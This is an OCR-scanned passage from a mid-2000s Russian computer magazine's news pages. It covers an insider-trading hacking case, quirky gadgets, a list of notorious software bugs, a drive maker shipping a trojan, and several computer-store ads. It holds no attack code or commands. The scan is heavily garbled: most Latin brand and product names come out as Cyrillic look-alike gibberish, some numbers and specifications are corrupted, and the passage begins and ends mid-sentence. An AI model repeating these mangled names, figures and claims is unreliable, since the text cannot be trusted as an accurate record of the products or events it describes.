тановили жучок на сайте Визіпезз ѴѴіге и стали ждать. Стоит сказать, что 
ВѴѴ — это центральный портал, на который стекаются пресс-релизы и 
инфа об акциях разных компаний со всего мира. Все это приходит в за- 
шифрованном виде, обрабатывается сотрудниками сайта и затем об- 
народуется. ВѴѴ является основным источником инфы для брокеров ве- 
дущих бирж, на основе данных оттуда ведется анализ стоимости тех 
или иных акций. Но вернемся к нашим хакерам. Шпионская прога авто- 
матически подбирала пароли на закрытые участки сервера и отсылала 
все полученные данные двум банкирам. Преимущества даже в 2 часа 
на фондовой бирже достаточно, чтобы заработать большие деньги. 
И эстонские парни времени не теряли. Всего за 10 месяцев на бирже- 
вых играх с помощью взломанной инфы, Оливеру и Кристиану удалось 
заработать почти 8 миллионов долларов. Но сладкая жизнь долго про- 
должаться не могла. В прошлом месяце парней вычислили, и теперь 
иск по их делу проходит в нью-йоркском суде. 



ДВА ШАГА ВПЕРЕД 



МУЗЫКАЛЬНЫЙ 

СИЛИКОН 




Некоторые люди настолько прагматичны, что стремятся найти практичес- 
кое применение совершенно бесполезным на первый взгляд вещам. 
Взять хотя бы силикон, да-да, самые обычные силиконовые имплантанты 
для увеличения размера бюста. Казалось бы, бестолковее вещи сложно 
найти, но и здесь не все безнадежно. Іап Реагзоп — исследователь из ком- 
пании ВТ І_аЬогаІогіез — предложил встроить силиконовые протезы в 
МРЗ-плеер! Причем в одну грудь будет имплантироваться сам плеер, а в 
другую — чип для хранения данных. Общаться же друг с другом и с внеш- 
ним миром они будут по технологии ВІиеІооШ. Само собой, оба модуля бу- 
дут сверхминиатюрными, так что на ощупь все должно остаться таким же 
приятным, как прежде. В принципе, проект планируется реализовать не 
раньше чем через 15 лет, и более детальная информация пока не разгла- 
шается, поэтому остальные подробности приходится домысливать за ав- 
тора. Во-первых, не понятно, каким образом модули будут подзаряжать- 
ся, очевидно, что никакие внешние разъемы не приемлемы, так что мож- 
но будет использовать популярный ныне индукционный метод или старый 
проверенный метод встряхивания :). Также для прослушивания музыки 
потребуются беспроводные наушники (передача вибраций через кости и 
громкоговорители отметаются), ну и пульт управления. Мне вот только ин- 
тересно, после такого апгрейда девушка будет считаться киборгом? 




В последние несколько лет в новостях не раз проскакивали сообщения об 
изобретении устройств, позволяющих дистанционно управлять, например, 
тараканами или мышами. Но никто и не подозревал, что манипулировать че- 
ловеком окажется ничуть не сложнее, при этом можно будет даже обойтись 
без хирургического вмешательства и имплантирования в организм всяких 
чипов. За данное изобретение ответственна японская корпорация ЫТТ 
(Гѵіірроп ТеІедгарН & ТеІерИопе). Устройство представляет собой огромные 
«наушники», надеваемые на подопытного, и пульт дистанционного управле- 
ния (как от гоночной машинки). Естественно, заставить подопытного спля- 
сать джигу не удастся, можно лишь управлять его движением (вперед — 
назад — вправо — влево). Если на пульте в любом направлении отклонить 
джойстик, то «наушники» пошлют едва заметный электрический импульс в 
область уха (примерно туда, где находится вестибулярный аппарат). Однако 
мозг истолкует этот импульс не как легкий укол, а как сигнал от вестибуляр- 
ного аппарата, что тело потеряло равновесие и начинает падать. В этот мо- 
мент человек на самом деле потеряет равновесие и, чтобы не упасть, будет 

вынужден сделать шаг в сто- 
рону (как раз туда, куда был 
направлен джойстик). Как 
показали опыты, не подчи- 
ниться приказу абсолютно 
нереально, иначе просто упа- 
дешь. Заявлено, что устрой- 
ство предназначено для при- 
дания реалистичности вирту- 
альным играм, но где оно 
найдет свое окончательное 
применение пока не извест- 
но. Кстати, новинка еще не 
получила официального 
подтверждения о безвред- 
ности для здоровья, поэтому 
о поступлении девайса в про- 
дажу говорить еще рано. 




ТЕРАБАЙТНЫЙ 

КОНСТРУКТОР 

Если ты не успел в детстве наиграться во всякие конструкторы, то не все еще 
потеряно. Однако не обязательно рыться на чердаке в поисках пыльного 
мешка со старыми игрушками, сейчас можно придумать и более высокотех- 
нологичные развлечения. Так, например, довольно известная за бугром 
фирма І_аСіе недавно анонсировала линейку внешних жестких дисков І_аСіе 
Вгіск, выполненных в форме, полностью повторяющей детальки І_Е(30, толь- 
ко гипертрофированного размера. На выбор предоставляются винты трех 
цветов (белые, синие и красные) и трех различных размеров (160 Гб, 250 Гб 
и 500 Гб). Увы, оставшиеся характеристики не сообщаются, но есть надеж- 
да, что с этим все в порядке (РігеѴѴіге и все такое). Впрочем, самый шик в 
том, что блоки можно соединять друг с другом точно так же, как в обычном 
І_Е(30. Таким образом, из пары десятков жестких дисков можно построить 
стенку или даже небольшой домик. Было бы вообще великолепно, если бы 
производители развили идею и выпустили блоки другой формы и с другой 
функциональностью. Единственное, что пока ограничивает фантазию юного 
архитектора, — цена. Винчестер будет стоить от 1 19.99 до 399.99 америка- 
нских президентов (в зависимости от вместимости). 









Формат больше. Точность выше. 

Если изображение, напечатанное на большом формате, выглядит невероятно близким 
к реальности - значит, мы добились отличного результата! Именно такое качество 
гарантируют последние модели широкоформатных принтеров ітадРВОбВАР ѴѴ8400 
и ѴѴ6400. Удивительный отпечаток, в котором даже мельчайшие объекты выглядят 
как настоящие. Время печати формата АО всего 2 минуты 1 2 секунд! Все эти качества 
позволят заметно повысить прибыльность вашего бизнеса, ѵѵѵѵѵѵ.сапоп.ги 



^ +7(095) 258 56 00 (Москва) 

^ +7(812) 326 61 00 (Санкт-Петербург) 

^ 8 800 200 56 00 (для регионов звонок бесплатный) 



уои сап' 

Сапоп 




ѴѴ22005 ѴѴ6400 ѴѴ7200 ѴѴ8400 



Исключительное качество печати гарантировано только при использовании і тадеРКОСКАР 

оригинальных чернил и бумаги для струйных принтеров Сапоп. 




НАВОМЕѴѴЗ ▼ 



НАВРЫЕѴѴЗ ▼ 



, А8ІІ8 НЕ ДАСТ 

5 ПОТЕРЯТЬСЯ 

_0 

О 

§ Для продвинутых путешественников и тех, кто хорошо знает о славе Су- 
х санина, но не хочет попасть в такую же ситуацию, пришла хорошая но- 
вость от компании А81І8, которая запустила в производство две моде- 
ли карманных ПК (МуРаІ А636 и А632), оснащенных функциями ОР8. 
Для четкой связи со спутником присутствует выносная антенна (25x25 мм, 
хранится в корпусе КПК), а изображение на экране можно расположить 
как вертикально, так и горизонтально. Оснащенные процессором Іпіеі 
Х8саІе416 МГц и ОС ѴѴіпсІоѵѵз МоЬіІе 5.0, А81І8 А636 и А632 не потеря- 
ли обычных функций КПК, включая запуск приложений МісгозоГС ОІІісе, 
встроенные средства связи ѴѴі-Рі (модель А636), ВІиеІооІП, ІЮА, а также 
порт 118В для подключения дополнительных устройств. В дополнение к 
128 Мб встроенной памяти РІазІі РЮМ и 64 Мб 8ЭВАМ, А636/632 также 
поддерживают карты памяти (А81І8 А636 имеет слот 80, а А81І8 А632 
работает также с картами тіпі80). Вес устройств составляет 186 г. 




стильный 

ПЛЕЕР ІПІѴЕК 




Если ты находишься в замешательстве и не знаешь, что подарить 
своей девушке на предстоящие праздники, то тебе поможет новинка 
от компании ІВІѴЕВ — плеер-кулон N1 1 , декорированный кристаллом 
8ѵѵагоѵзку. Это устройство является логическим продолжением изде- 
лия N10 — первого в серии плееров-кулонов. Новый N1 1 поддержива- 
ет воспроизведение фор- 
матов МРЗ, ѴѴМА, А8Р и 
ООО ѴогЬіз, а также ос- 
нащен РМ-приемником. 
Дополнительную функци- 
ональность обеспечивают 
часы, будильник, таймер 
и встроенный диктофон, 
поддерживающий техно- 
логии 8А0 (останавлива- 
ет запись при отсутствии 
звука) и АОС (сжатие для 
уменьшения объема фай- 
ла). Производитель обе- 
щает 14 часов непрерыв- 
ной работы и полную пе- 
резарядку батареи за 1,5 
часа. Габариты кулона не- 
велики: 27,2x49,8x13,3 мм 
и вес 22 г. Мы думаем, что 
это хороший и функцио- 
нальный подарок. 



МОЩНЕЙШЕЕ ВИДЕО 

Если для тебя главным в компьютере является мощь видеоплаты и каче- 
ство картинки, которую она выдает, то тебе нужно срочно найти около 
500 долларов, чтобы приобрести устройство І_еасМек ѴѴіпРазІ РХ7800 
ОТХ ТОН МуѴІѴО Ехігете. Почему? Да потому, что оно построено на пос- 
леднем и самом скоростном чипсете пѴісІіа (ѲеРогсе 7800 ОТХ) и осна- 
щено 512 Мб памяти ОООВЗ (в ВОА-упаковке). Естественно, что эта пла- 
та имеет интерфейс РСІ-Ехргезз и поддерживает технологию 8І_І (тут, 
правда, стоит отметить, что пара этих плат по цене равняется стоимости 
неплохого компьютера). Также поддерживаются все фирменные графи- 
ческие технологии пѴісІіа, такие как Шга 8НасІоѵѵ II и уже четвертые вер- 
сии СіпеРХ и ІпІеІІі8атрІе. Характеристики у платы такие: 256-битная ши- 
на памяти, частота ядра — 550 МГц, памяти — 1700 МГц. Для подключе- 
ния к различным устройствам есть два порта ЭѴІ и гнездо ѴІѴО. 



СЭеРопсе 

^Зегэіез 



ЬС ДЛЯ ДОМА 
И ОФИСА 

Компания І_(3 выпустила ноутбук, ориентированный на пользовате- 
лей, выбирающих устройства по соотношению цена/качество. Устрой- 
ство І_Е50 стоит около 1000 долларов, имея при этом хорошие харак- 
теристики. Он обладает 15-дюймовым экраном с разрешением ХѲА, 
процессором Іпіеі Сеіегоп М, а его системная плата базируется на 
чипсете АТІ В8400МЭ, который еще и обладает встроенным графи- 
ческим адаптером (АТІ Вабеоп 200М). Собственной видеопамяти он 
не имеет, но для него из ОЗУ может быть выделено до 128 Мб. Базо- 
вая комплектация І_Е50 выглядит следующим образом: 256 V, опера- 
тивной памяти ЭОВ2 533, 40 Гб ИВО, оптический привод 0\Ю 8ирег 
МиШ (работает также с двухслойными дисками), четырехформатный 
кардридер, восьмиканальный звуковой кодек, полный набор необхо- 
димых портов и адаптер ѴѴі-Рі. Масса ноутбука — 2,7, размеры — 
329x274x30,5. Обещанное время автономной работы — 3,5 часа. 
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НІТЕСНМЕѴѴЗ Ж 



НІТЕСНЫЕѴѴЗ ▼ 



МЕЧТА ФЕТИШИСТА 

Ко многим модным Иі-ІесИ вещицам уже давно приклеилось слово зеху, и, 
конечно же, плеер іРосІ здесь в первых рядах. Только до недавних пор все 
это было весьма условно, и лишь теперь контакт с любимым устройством 
может стать вполне реальным. Итак, встречайте — \Вигг — уникальный 
вибратор для ІРосІ! Естественно, устройство позиционируется для деву- 
шек, но, я думаю, ничто не мешает его использовать в качестве хм... уни- 
версального массажера. Работает все довольно просто: в разъем наушни- 
ков плеера вставляется разветвитель, к нему подключаются обычные на- 
ушники и основной блок ІВ 1122 , к которому на проводке присоединен сам 
вибратор. Если на плеере нажать ріау, то девайс начнет радовать хозяйку 
приятными вибрациями, следующими в такт музыке. Заявлено, что ІВ 1122 
совместим только с плеерами фирмы Арріе, однако я не вижу причин, по- 
чему бы он мог не срастись с проигрывателями от других производителей. 
Кстати, чтобы девайс быстро не наскучил, в комплекте с ним идут нес- 
колько оригинальных сменных насадок. И даже если под рукой не оказа- 
лось плеера — тоже не беда, всегда можно выбрать один из семи предус- 
тановленных режимов доставления удовольствий. Пока ІВ 1122 еще не пос- 
тупил в продажу, но на него уже можно сделать предварительный заказ, 
расставшись со вполне адекватной суммой в 29.99 евро. 




ПОБЕДИ СВОЙ БОНСАЙ 

Ты согласен, что в компьютер- 
ные игры гораздо интереснее 
сражаться с живым противни- 
ком, нежели с бездушным 
электронным болваном? Толь- 
ко это далеко не всегда удает- 
ся: Интернет может быть не- 
доступен, а в округе — ни од- 
ного игрового клуба. Но не 
стоит расстраиваться, мо- 
жешь выбрать себе в качестве 
оппонента, например, кактус 
или любое другое растение, обитающее неподалеку на подоконнике, при- 
чем для этого даже не придется глотать никаких сильнодействующих гал- 
люциногенов. В этом тебе поможет устройство, которое изобрел английс- 
кий художник Оап Уоипд. Хитроумный девайс способен преобразовывать 
импульсы растений в сигналы, понятные компьютеру, а затем передавать 
их на последовательный порт. Конечно, в Оиаке с бонсаем погонять не 
удастся, но взамен можно скачать пару простеньких игр, специально адап- 
тированных для этих целей. В обеих играх главный герой — лесоруб, кото- 
рый сражается с полчищами наступающих деревьев, только в первой бит- 
ва происходит на открытых просторах, а во второй — в лабиринте (так же 
как в знаменитом Растап'е). Само собой, лесорубом управляешь ты, а де- 
ревьями — растение. Кстати, автор утверждает, что интереснее всего будет 
играть, если горшок с растением вынести на свежий воздух и усесться ря- 
дом с ноутбуком. Вот только ни в чем неповинное растение жалко, боюсь, 
некоторые проигравшие будут срывать свою злость именно на нем. 



УМНЫЙ БЕЙДЖ 

Во многих крупных фир- 
мах всех сотрудников 
заставляют каждый день 
носить не только пиджак, 
брюки, белую рубашку, 
галстук, но еще и дурац- 
кий бейджик с фотогра- 
фией и прочими личными 
данными. И если с дело- 
вой формой все могут 
смириться, то последняя 
деталь некоторых просто 
выводит из себя. Воз- 
можно, сменить их гнев 
на милость сможет уни- 
кальный интеллектуаль- 
ный бейдж от компании Іцііа. От стандартной карточки на веревочке 
его, прежде всего, отличает наличие встроенной ВІиеІооІИ-гарнитуры: 
на уровне рта на шнурке крепится миниатюрный передатчик с микро- 
фоном, от которого на проводе идет небольшой наушник. При этом вес 
бейджа практически не изменился — все вместе не более 45 г. Іциа 
Зтагі Вабде совместим практически со всеми мобильниками, поддер- 
живающими ВІиеІооІИ, и способен проработать без подзарядки 40 ча- 
сов в режиме разговора и целых 25 дней — в режиме ожидания. И, ко- 
нечно, девайс исполнен в безупречно стильном дизайне, так что явно 
найдется немало желающих заполучить его в свое распоряжение. 



ѵкоооооооом 

Мечтаешь, чтобы твой же- 
лезный конь мог взреветь 
точно так же, как форсиро- 
ванный ЗНеІЬу Мизіапд? 
Если ты уже перепробовал 
все способы, и все равно 
рев мотора напоминает 
звуки при несварении же- 
лудка, то на помощь тебе 
придет устройство под наз- 
ванием ѴгоотВох. Данный 
девайс состоит из процес- 
сора звуковых эффектов, 
пульта дистанционного уп- 
равления и мощных дина- 
миков, устанавливаемых 
под днищем автомобиля. 
Через пульт настраивается 
звучание: какой машине 
необходимо симулировать, 
какой воспроизводить эф- 
фект и на какой громкости. 
Изначально на выбор пред- 
лагаются голосовые дан- 
ные пятнадцати машины, но через ІІЗВ на ѴгоотВох можно закачать 
настройки еще для тридцати дополнительных суперкаров. Для каждой 
машины предусмотрен собственный набор звуковых эффектов (таких 
как рев мотора, резкое торможение, закись азота и многое другое). 
Примечательно, что не обязательно каждый раз нажимать на кнопку, 
когда нужно воспроизвести какой-либо звук — устройство способно 
самостоятельно определять обороты двигателя и по ним подбирать 
требуемый звуковой эффект. Обойдется данное развлечение в 159 
баксов, плюс еще по 5 за звуковые файлы от каждой дополнительной 
машины. Если тебе жалко расставаться с этой суммой, то можно при- 
обрести более скромное приспособление — то же самое, только ос- 
новной блок предназначен для прикуривателя и кассетный адаптер — 
для магнитолы. С ним можно будет воспроизводить звуки только через 
акустику в салоне, но если поставить динамики помощнее и держать 
форточки открытыми, то эффект будет тот же. 








Товар сертифицирован 



\л/\л/\л/.80пуегіс580п.ги 



МУЗЫКА ТВОЕЙ ЖИЗНИ 

ТЕЛЕФОН Ѵ\/550і \Л/А1_КМАЫ™ 

СО ВСТРОЕННЫМИ СТЕРЕОДИНАМИКАМИ 

Доверь музыку своей жизни новому мобильному телефону 5опу Егісззоп ѴѴ550І ѴѴаІктап™. Ты можешь 
закачать в него до 1 20 треков с компьютера или с компакт-дисков и слушать свою музыку... и не только в 
наушниках! 5опу Егісззоп ѴѴ550І ѴѴаІктап™ оснащен двумя динамиками и функцией МедаВазз™, которые 
обеспечат тебе звук превосходного качества! Также в 5опу Егісззоп ѴѴ550І ѴѴаІктап™ есть встроенная 
1 ,3-мегапиксельная камера, чтобы делать классные снимки, и РМ-приемник, чтобы музыки было еще больше! 



& 



Зону Егісззоп 



Логотип и торговый знак ѴѴаІктап™ и МедаВазз™ 
являются зарегистрированным товарным знаком Зопу СогрогаЛоп. 
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28 июля 1962 года из-за 
поломки антенны косми- 
ческий аппарат Магіпег I, 
направлявшийся к Вене- 
ре, потерял связь с Зем- 
лей и переключился на 
автопилот. Но в этот мо- 
мент навигационная сис- 
тема дала сбой, и аппарат 
пришлось сбить над океа- 
ном. Оказалось, что прои- 
зошло это из-за одного 
единственного пропущен- 
ного символа во время 
программирования систе- 
мы навигации. 



В 1 982 году в ответ на по- 
пытки Советского Союза 
украсть американские тех- 
нологии, Ц-Р-У внедрило 
баг в канадскую систему 
контроля над Транссибирс- 
ким трубопроводом. После 
приобретения и запуска 
этой системы на трубоп- 
роводе произошел самый 
большой неядерный взрыв 
в истории. 



В 1985 — 1986 годах в ре- 
зультате неправильного 
программирования новых 
функций прибора для ради- 
ационной терапии ТПегас- 
25 несколько человек полу- 
чили смертельную дозу ра- 
диации, а множество — 
серьезное облучение. Как 
выяснилось, ПО для прибо- 
ра писал неопытный прог- 
раммист, не имеющий даже 
специального образования. 



В 1988 году в результате 
незначительной ошибки в 
коде компьютерный червь 
Роберта Морриса за одну 
ночь заразил около 6000 
компьютеров АВРАпеі, 
выведя из строя многие 
из них и замедлив работу 
сети в целом. 



С 1988 по 1996 год каж- 
дый мог легко проникнуть 
в любую компьютерную 
систему, использующую 
для генерации паролей 
модуль КегЬегоз. Счита- 
лось, что ключ выбирает- 
ся из многих миллиардов 
чисел, но из-за бага в ко- 
де диапазон выбора нас- 
читывал всего лишь мил- 
лион символов. 







Г«Т*Ѵ1 
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1 5 января 1 990 года произо- 
шел серьезный сбой в рабо- 
те крупнейшей американс- 
кой телефонной сети АТ&Т, 
в результате которого вся 
страна осталась без между- 
городней связи на 9 часов. 
Из-за ошибки в новой вер- 
сии прошивки коммутато- 
ров они перезагружались, 
получив определенный сиг- 
нал с соседнего коммутато- 
ра. А возникал этот сигнал 
как раз в момент перезаг- 
рузки. Для образования 
цепной реакции было дос- 
таточно одного ребута лю- 
бого из коммутаторов. 



В 1993 году незначительная 
погрешность, обнаруженная 
в процессорах Іпіеі Репйит 
при делении с плавающей 
запятой (составляла она не 
более 0.006%), обошлась 
компании в 475 миллионов 
долларов и серьезно подпор- 
тила ее авторитет. 



1 995 — 1 996 года — звезд- 
ное время «Пинга смер- 
ти». В это время посылка 
специально сконструиро- 
ванного пакета на любой 
компьютер выводила его 
из строя. А все из-за того, 
что при разработке сете- 
вых технологий програм- 
меры забыли вставить 
проверку на ошибки при 
обработке ІР-пакетов. 



4 июня 1996 года, через 40 
секунд после старта, прои- 
зошел взрыв ракетоноси- 
теля Агіапе 5, который раз- 
рабатывался несколько лет 
и оценивался в более 500 
миллионов долларов. 
Просто инженеры сняли за- 
щиту от ошибок переполне- 
ния буфера, уверенные, 
что переполнения быть не 
может. Но система навига- 
ции подала недопустимо 
большое значение пара- 
метра горизонтальной ско- 
рости, и это вызвало цеп- 
ную реакцию, которая сна- 
чала остановила работу 
процессоров, а потом дето- 
нировала взрыв. 



В ноябре 2000 года прои- 
зошло несколько смертель- 
ных случаев облучения в па- 
намском национальном инс- 
титуте рака. Врачи, работа- 
ющие в институте, решили 
не ограничиваться возмож- 
ностями американской прог- 
раммы планирования ради- 
ационной терапии и внесли 
в нее «корректировки». Пос- 
ледствия были плачевными: 
пациенты получили двой- 
ную дозу облучения и погиб- 
ли. Экспериментаторов осу- 
дили за убийство. 










самых 
страшных 
багов 
в истории 

ЕСЛИ ТЫ ДУМАЕШЬ, ЧТО САМЫЙ СТРАШНЫЙ БАГ — ЭТО ТВОЯ ВИНДА, КОТОРАЯ ЗАВИСЛА ВО ВРЕМЯ ПРОСМОТРА 
ПОРНУШКИ, ТО ТЫ ОШИБАЕШЬСЯ, ДРУЖОК. СЛУЧАЛОСЬ, ЧТО ИЗ-ЗА СБОЕВ ТЕХНИКИ ТЕРЯЛИСЬ МИЛЛИОНЫ 
ДОЛЛАРОВ И ДАЖЕ ЧЕЛОВЕЧЕСКИЕ ЖИЗНИ. В ПРОШЛОМ НОМЕРЕ ПОПУЛЯРНЫЙ ЖУРНАЛ ѴѴІВЕО ОПУБЛИКОВАЛ 
СПИСОК САМЫХ СТРАШНЫХ БАГОВ В ИСТОРИИ. ДУМАЮ, ТЕБЕ БУДЕТ ИНТЕРЕСНО С НИМ ОЗНАКОМИТЬСЯ. 




Чтобы не засох от скуки в Новом Году! 

За год многое может наскучить. Но только не твой новый 
компьютер ІКВІ5® Сі на базе процессора Іпіеі® Репііит® 4! 
Как только почувствуешь приближение скуки - включай его. 
Игры, кино, музыка, общение в Интернете... 

И хандры как не бывало! 

Огры&г&ся по полной б //о&о/і 




® 

ІКВІ5 

КОМПЬЮТЕРЫ И НОУТБУКИ 



Интернет-магазин «Ваш компьютер»: ѵѵѵѵѵѵ.к-зузіетз.ги, тел. (095) 783-0118. 
Спрашивайте компьютеры ІКВІ8 в сетях бытовой электроники: 

Эльдорадо, М. Видео, МИР 



Іпіеі, логотип Іпіеі, Іпіеі Іпзісіе, логотип Іпіеі Іпзісіе и Репііипл являются товарными знаками или зарегистрированными товарными знаками корпорации Іпіеі и ее 
подразделений в США и других странах. 
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НІТЕСНМЕѴѴЗ Ж 



МЫШЬ НЕ 
ДОЛЖНА 
БЫТЬ СЕРОЙ! 

Для большинства эстетов компьютер уже давно 
перестал быть лишь рабочим инструментом, а с 
широким распространением ноутов и вовсе стал 
неотъемлемой деталью имиджа наравне с сото- 



выми, КПК и прочими Ні-ІесІі примочками. Так что 
совсем неудивительно, что данные личности да- 
же мышку выбирают, руководствуясь не рабочи- 
ми характеристиками и эргономичностью, а иск- 
лючительно по внешнему виду. Теперь же на их 
улице наступил настоящий праздник: германс- 
кая компания Раі Зауз Гѵіоѵѵ выпустила целую 
коллекцию имиджевых грызунов. На выбор 
предлагаются модели совершенно разных 
форм (в виде чилийского перца, мозга, головы 
собаки, сердца и т.д.) и раскрасок (под корову, 



под национальный флаг и т.п.). В ассортименте 
компании можно найти даже гламурные полуэ- 
ксклюзивные экспонаты, например, мышь, инк- 
рустированная тридцатью тремя бриллиантами 
(выпущено всего 999 копий). Впрочем, встреча- 
ются и манипуляторы классической формы, 
выделяющиеся лишь рисунком, которые впол- 
не пригодны для ежедневного использования. 
В общем, среди такого разнообразия, навер- 
ное, любой сможет найти грызуна, точно под- 
черкивающего индивидуальность хозяина. 




КНИЖНЫЙ СКАНЕР 

После того как в моду стали входить различные электронные портатив- 
ные устройства (ноутбуки, наладонники, сотовые), популярность бумаж- 
ных книг постепенно стала существенно падать. Ведь гораздо удобнее 
уместить несколько книг в небольшом девайсе, чем таскать 
в рюкзаке целую библиотеку. Есть только одна проблема: далеко не все 
книги пока существуют в электронном варианте, а оцифровывать станда- 
ртным планшетным сканером талмуд форм-фактора «Войны 
и мира» — проще сразу застрелиться. Как раз специально, чтобы избе- 
жать подобных массовых самоубийств, компания Кігіаз ТесИпоІодіез раз- 
работала один из первых в мире сканеров, способных самостоятельно пе- 
релистывать страницы книг. Конечно, девайс по своим размерам сравним 

с небольшим шкафом, а цена 
его наверняка умалчивается 
исключительно по этическим 
соображениям, поэтому поку- 
пателями, скорее всего, выс- 
тупят лишь богатые зарубеж- 
ные библиотеки. Правда, если 
тех удовлетворит, насколько 
бережно устройство обраща- 
ется с ветхими изданиями, и 
как много пропускает слип- 
шихся страниц. Кстати, если 
интересно, как эта адская ма- 
шина функционирует, то на 
официальном сайте фирмы 
(Шаз-іесіі.сот) можно взгля- 
нуть на демонстрационные ви- 
деоролики. 





Мы делаем лучшее доступным! неоторг 

^ ^ сеть компьютерных магазинов | 




Торговая компания НѲОТОрг приглашает Вас посетить сеть компьютерных магазинов. 
Комфортабельные торговые залы, широкий ассортимент и профессиональная работа 
менеджеров превратят процесс выбора и покупки в удовольствие. Уважительное обслуживание 
и качественный сервис с каждым днем привлекают все большее количество клиентов в 
нашу сеть. Собственное сборочное производство и розничная сеть позволяют предлагать 
нашим клиентам минимальные цены. Строгий входной контроль и многоэтапное тестирование 
гарантируют безукоризненное качество мирового уровня. 



В кредит от $124 

ІМео РС® Сате 5Нооіег 3400 

• ІпГеІ® РепГіит® 4 Ргосѳббог 3400МН2 НТ ТесГіпоІоду 

• ѵѵіШ 1066МН2 РгопГ Бісіе Выб СасРіе 2048кЬ 

• МісгобоШ® ѴѴІпсіоѵѵб® ХР РгоГеББІопаІ РІІ5 

• КЗЬ ЭиаІ СГіаппеІ ЭЭШІ аГ 667МНг 

• 200СЬ НагсІ Эгіѵе (7200грт) 5-АТА 

• 256МВ пѴЮІА (ЗеРогсе 78006Т РСІ-Х СгарЫсБ СагсІ 

• ЭѴЭ+РѴѴ апсі ЭѴЭ-КОМ Эгіѵѳб 

• ІпГедгаГесІ 9.1 СГіаппеІ Аисііо 

• 19" МЕС І_СЭ ТѴ 8іті5 +$325 

• РгосІисЛѵіГу Раск 

• Клавиатура І_оді1:есІі ѴѴігѳіѳбб 

• Оптическая мышь 

• Гарантия 3 года 



В кредит от $129 



РиііІ5и-Біетеп5® 3000 МНг 

• ІпГеІ® РепЛит® 4 Ргосѳббог ЗОООМНг (1024КЬ / БЗЗМНг) 

• МісгобоШ® ѴѴІпсіоѵѵб® ХР Ноте ЕсІІЛоп КІ35 

• МВ Р5С ІпГеІ СГіірБе* 

• 512МЬ ЭиаІ СЬаппеІ ЭЭК 

• 60СЫІІКВО (5400грт) НЭЭ ІЮМА 
•15,4" ѴѴХ6АТРТ дисплей 

• 128МЬ Расіеоп 9700 (МП) 128Ы* ТѴ-оиГ & ѴСА-оіД 

• ЭѴЭ+РѴѴ 

• БоипсІ 5.1 

• Вес 3,0 кг 

• Гарантия 2 года 

• Сумка и мышь в комплекте 

• ѴѴІ-РІ / ІР /1394 / 56К / І_АІ\1 10/100 / ЭБВ 2.0 / І_РТ 



В кредит от $69 

№0 РС® Сате Атаіеиг 3200 

|. іпТеІ® РепЛит® 4 Ргосѳббог 3200МН2 НТ ТесЛпоІоду 
,* МісгобоГі:® ѴѴІпсіоѵѵб® ХР Ноте ЕсІіЛоп РІЛ5 2005 
512МЬ ЭиаІ СЛаппеІ ЭЭК БЭРАМ 
ІбОСЬ НагсІ Эгіѵе (7200грт) 5-АТА 
~5бМЬ АТІ Расіеоп Х700Рго РСІ-Х СгарЫсБ СагсІ 
2х СЭ-РѴѴ/ЭѴЭ СотЬо Эгіѵе 
ТедгаГесІ 7.1 СЛаппеІ Аисііо 
" БатБипд ЬСЭ ТѴ 8т5 +$235 

• РгосІисЛѵіІу Раск 
^Иавиатура ЬодіГесГі 

• Оптическая мышь 



Рекомендуемый Црдгасіе 



• I пТеІ® Иепііит® 4 Ргосѳббог 3400МН2 НТ ТесЛпоІоду 

• йѴО+РѴѴ апсі ЭѴЭ-КОМ ЭгіѵеБ 

• 512МЛ РиаІ СЛаппеІ ЭРВ БЭРАМ 



$49 

$39 

$45 



Рекомендуемый Црдгасіе 

• Іпіеі® РепЛит® Р Ргосѳббог 3200МН2 2х1024кЬ сасНе РгѳбсоД $299 

• ІСЬ ЭиаІ СЛаппеІ ЭЭШІ а* 667МН2 $149 

• СгеаЛѵе АІЮІСѴ-2 25 РІаЛпит 7.1 $145 



Рекомендуемый Іірдгасіе 

• ѴѴі-Рі «Бігеат» Роиіег 

• БІІт аііитіпіит НЭЭ 80СЬ 115В 2.0 

• Эоот III геіаіі РЫБ 



$ 120 

$ 120 

$ 59 




363 - 38-25 

Единая справочная служба 
Заказ по телефону 




101 - 30-23 

Корпоративный отдел 
Персональный менеджер 




ѵѵѵѵѵѵ.пеозНор.ги 

Интернет-магазин 
Уникальный сервис 



м «Беляево», Миклухо-Маклая, ул., д.37, ТЦ «Меркадо» 105-52-58 

м «Бульвар Адм. Ушакова», Веневская ул., ТЦ «Южное Бутово» 363-38-25 

м «Варшавская», Варшавское шоссе, д.82 363-38-25 

м «Водный стадион», Кронштадтский бульвар, д.7, ТЦ «Крона» 786-22-26 

м «Дмитровская», Бутырская ул., д.97 737-59-37 

м «Добрынинская», Люсиновская ул., д.7 237-05-57 

м «Коломенская», Судостроительная ул., д.1 115-00-16 

м «Комсомольская», Универмаг «Московский», 4 эт. 916-57-24 

м «Ленинский пр-т». Ленинский пр-т, Д.37А 974-87-68 

м «Марьино», Люблинская ул., Д.102А, ТЦ «Марьинский пассаж» 580-73-15 

м «Медведково», Широкая ул., д.9, к.1, ТЦ «Меркадо» 656-93-73 



м «Петровско-Разумовская», ТК «Электромаркет» 363-38-25 

м «Пражская», Кировоградская ул., д.15, ТЦ «Электронный Рай» .389-66-27 

м «Пролетарская», 3-й Крутицкий пер., д.15 676-33-71 

м «Пр-т Вернадского», пр-т Вернадского, д.39 933-43-40 

м «Савёловская», Сущевский вал, д.5, стр.22 363-38-25 

м «Сокол», Волоколамское шоссе, д.1, к.1 158-06-33 

м «Сходненская», Яна Райниса бульвар, д.2, к.1 363-38-25 

м «Чертановская», Чертановская ул., стр.2, ТЦ «Каспий» 105-81-12 

м «Шоссе Энтузиастов», пр-т Буденного, д.53, ТЦ «Буденовский» 788-07-41 

м «Щелковская», Уральская ул., вл.1, ТЦ «Русское бистро» 786-96-45 

м «Электрозаводская», Б. Семеновская ул., д.Ю 962-17-07 
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НАВЭМЕѴѴЗ Ж 



НІТЕСНЫЕѴѴЗ ▼ 



ОБЛАЖАЛИСЬ 



МЕГАЗАМОК 



Выпуская новую серию внеш- 
них жестких дисков НЮР-ІІ, ос- 
нащенных антишоком, уважа- 
емая фирма ІО ЭаШ Оеѵісе 
Согрогаііоп более чем халатно 
отнеслась к тестированию, и в 
результате оказалось, что су- 
щественная партия накопите- 
лей поступила на прилавки 
сразу в комплекте с любезно 
предустановленным трояном 
(ѴѴ32/Тотраі-А). Однако огор- 
чает не столько наличие троя- 
на (с кем не бывает), сколько дальнейшее поведение компании. Вместо 
того чтобы принять оперативные меры, после того как прознали об ин- 
циденте, они некоторое время вообще удерживали в тайне серийные но- 
мера инфицированных винчестеров. А затем, огласив номера партий, 
просто ограничились формальными извинениями, не предложив покупа- 
телям даже никакого фикса для удаления трояна. В результате компа- 
